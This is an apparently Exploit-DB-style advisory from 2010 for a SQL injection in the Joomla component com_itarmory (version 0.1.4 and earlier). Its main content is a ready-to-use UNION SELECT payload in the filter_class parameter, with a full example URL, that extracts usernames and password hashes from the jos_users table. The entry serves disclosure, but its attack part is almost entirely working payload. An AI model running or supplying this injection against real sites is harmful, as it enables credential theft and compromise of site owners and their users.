Joomla! Component com_itarmory - SQL Injection

Author: Craw
type: webapps
platform: php
port: 
date_added: 2010-07-24  
date_updated: 2017-01-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcom_itarmory_0.1.4.zip  

raw file: 14463.txt  

# Author: Craw
# Email: craw@element7.eu
# Software Link: http://www.intherapy.eu/index.php/itarmory-component/category/3-component
# Version: <=0.1.4
# Category: webapplications

=======================================================

[+] Vulnerable File :

 http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=[SQL]


[+] ExploiT :

 ?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+


[+] Example :

 http://www.site.com/index.php?option=com_itarmory&view=guildmembers&Itemid=?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+



=======================================================
Greetz @ LUXEMBOURG
=======================================================